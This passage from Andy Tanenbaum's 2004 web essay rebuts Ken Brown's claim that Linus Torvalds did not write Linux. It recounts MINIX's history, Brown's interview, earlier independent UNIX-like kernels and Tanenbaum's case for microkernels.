permission to put the source on my website for free downloading, where it still is.

Within a couple of months of its release, MINIX became something of a cult item, with its own USENET newsgroup, comp.os.minix, with 40,000 subscribers. Many people added new utility programs and improved the kernel in numerous ways, but the original kernel was just the work of one person--me. Many people started pestering me about improving it. In addition to the many messages in the USENET newsgroup, I was getting 200 e-mails a day (at a time when only the chosen few had e-mail at all) saying things like: "I need pseudoterminals and I need them by Friday." My answer was generally quick and to the point: "No."

The reason for my frequent "no" was that everyone was trying to turn MINIX into a production-quality UNIX system and I didn't want it to get so complicated that it would become useless for my purpose, namely, teaching it to students. I also expected that the niche for a free production-quality UNIX system would be filled by either GNU or Berkeley UNIX shortly, so I wasn't really aiming at that. As it turned out, the GNU OS sort of went nowhere (although many UNIX utilities were written) and Berkeley UNIX got tied up in a lawsuit when its designers formed a company, BSDI, to sell it and they chose 1-800-ITS UNIX as their phone number. AT&T felt this constituted copyright infringement and sued them. It took a couple of years for this to get resolved. This delay in getting free BSD out there gave Linux the breathing space it needed to catch on. If it hadn't been for the lawsuit, undoubtedly BSD would have filled the niche for a powerful, free UNIX clone as it was already a stable, mature system with a large following.
Ken Brown and Me
Now Ken Brown shows up and begins asking questions. I quickly determined that he didn't know a thing about the history of UNIX, had never heard of the Salus book, and knew nothing about BSD and the AT&T lawsuit. I started to tell him the history, but he stopped me and said he was more interested in the legal aspects. I said: "Oh you mean about Dennis Ritchie's patent number 4135240 on the setuid bit?" Then I added:"That's not a problem. Bell Labs dedicated the patent." That's when I discovered that (1) he had never heard of the patent, (2) did not know what it meant to dedicate a patent (i.e., put it in the public domain), and (3) really did not know a thing about intellectual property law. He was confused about patents, copyrights, and trademarks. Gratuitously, I asked if he was a lawyer, but it was obvious he was not and he admitted it. At this point I was still thinking he might be a spy from SCO, but if he was, SCO was not getting its money's worth.

He wanted to go on about the ownership issue, but he was also trying to avoid telling me what his real purpose was, so he didn't phrase his questions very well. Finally he asked me if I thought Linus wrote Linux. I said that to the best of my knowledge, Linus wrote the whole kernel himself, but after it was released, other people began improving the kernel, which was very primitive initially, and adding new software to the system--essentially the same development model as MINIX. Then he began to focus on this, with questions like: "Didn't he steal pieces of MINIX without permission." I told him that MINIX had clearly had a huge influence on Linux in many ways, from the layout of the file system to the names in the source tree, but I didn't think Linus had used any of my code. Linus also used MINIX as his development platform initially, but there was nothing wrong with that. He asked if I objected to that and I said no, I didn't, people were free to use it as they wished for noncommercial purposes. Later MINIX was released under the Berkeley license, which freed it up for all purposes. It is still in surprisingly wide use, both for education and in the Third World, where millions of people are happy as a clam to have an old castoff 1-MB 386, on which MINIX runs just fine. The MINIX home page cited above still gets more than 1000 hits a week.

Finally, Brown began to focus sharply. He kept asking, in different forms, how one person could write an operating system all by himself. He simply didn't believe that was possible. So I had to give him more history, sigh. To start with, Ken Thompson wrote UNICS for the PDP-7 all by himself. When it was later moved to the PDP-11 and rewritten in C, Dennis Ritchie joined the team, but primarily focused on designing the C language, writing the C compiler, and writing the I/O system and device drivers. Ken wrote nearly all of the kernel himself.

In 1983, a now-defunct company named the Mark Williams company produced and sold a very good UNIX clone called Coherent. Most of the work was done by Bob Swartz. I used this system for a while and it was very solid.

In 1983, Rick Holt published a book, now out of print, on the TUNIS system, a UNIX-like system. This was certainly a rewrite since TUNIS was written in a completely new language, concurrent Euclid.

Then Doug Comer wrote XINU. While also not a UNIX clone, it was a comparable system.

By the time Linus started, five people had independently implemented the UNIX kernel or something approximating it, namely, Thompson, Swartz, Holt, Comer, and me. All of this was perfectly legal and nobody stole anything. Given this history, it is pretty hard to make a case that one person can't implement a system of the complexity of Linux, whose original size was about the same as V1.0 of MINIX.

Of course it is always true in science that people build upon the work of their predecessors. Even Ken Thompson wasn't the first. Before writing UNIX, Ken had worked on the MIT MULTICS (MULTiplexed Information and Computing Service) system. In fact, the original name of UNIX was UNICS, a joke made by Brian Kernighan standing for the UNIplexed Information and Computing Service, since the PDP-7 version could support only one user--Ken. After too many bad puns about EUNUCHS being a castrated MULTICS, the name was changed to UNIX. But even MULTICS wasn't first. Before it was the above-mentioned CTSS, designed by the same team at MIT.

Thus, of course, Linus didn't sit down in a vacuum and suddenly type in the Linux source code. He had my book, was running MINIX, and undoubtedly knew the history (since it is in my book). But the code was his. The proof of this is that he messed the design up. MINIX is a nice, modular microkernel system, with the memory manager and file system running as user-space processes. This makes the system cleaner and more reliable than a big monolithic kernel and easier to debug and maintain, at a small price in performance, although even on a 4.77 MHz 8088 it booted in maybe 5 seconds (vs. a minute for Windows on hardware 500 times faster). An example of commercially successful microkernel is QNX. Instead of writing a new file system and a new memory manager, which would have been easy, Linus rewrote the whole thing as a big monolithic kernel, complete with inline assembly code :-( . The first version of Linux was like a time machine. It went back to a system worse than what he already had on his desk. Of course, he was just a kid and didn't know better (although if he had paid better attention in class he should have), but producing a system that was fundamentally different from the base he started with seems pretty good proof that it was a redesign. I don't think he could have copied UNIX because he didn't have access to the UNIX source code, except maybe John Lions' book, which is about an earlier version of UNIX that does not resemble Linux so much.

My conclusion is that Ken Brown doesn't have a clue what he is talking about. I also have grave questions about his methodology. After he talked to me, he prowled the university halls buttonholing random students and asking them questions. Not exactly primary sources.

The six people I know of who (re)wrote UNIX all did it independently and nobody stole anything from anyone. Brown's remark that people have tried and failed for 30 years to build UNIX-like systems is patent nonsense. Six different people did it independently of one another. In science it is considered important to credit people for their ideas, and I think Linus has done this far less than he should have. Ken and Dennis are the real heros here. But Linus' sloppiness about attribution is no reason to assert that Linus didn't write Linux. He didn't write CTSS and he didn't write MULTICS and didn't write UNIX and he didn't write MINIX, but he did write Linux. I think Brown owes a number of us an apology.
Linus and Me

Some of you may find it odd that I am defending Linus here. After all, he and I had a fairly public "debate" some years back. My primary concern here is trying to get the truth out and not blame everything on some teenage girl from the back hills of West Virginia. Also, Linus and I are not "enemies" or anything like that. I met him once and he seemed like a nice friendly, smart guy. My only regret is that he didn't develop Linux based on the microkernel technology of MINIX. With all the security problems Windows has now, it is increasingly obvious to everyone that tiny microkernels, like that of MINIX, are a better base for operating systems than huge monolithic systems. Linux has been the victim of fewer attacks than Windows because (1) it actually is more secure, but also (2) most attackers think hitting Windows offers a bigger bang for the buck so Windows simply gets attacked more. As I did 20 years ago, I still fervently believe that the only way to make software secure, reliable, and fast is to make it small. Fight Features.

If you have made it this far, thank you for your time. Permission is hereby granted to mirror this web page provided that the original, unmodified version is used.

Andy Tanenbaum, 20 May 2004

Get Firefox!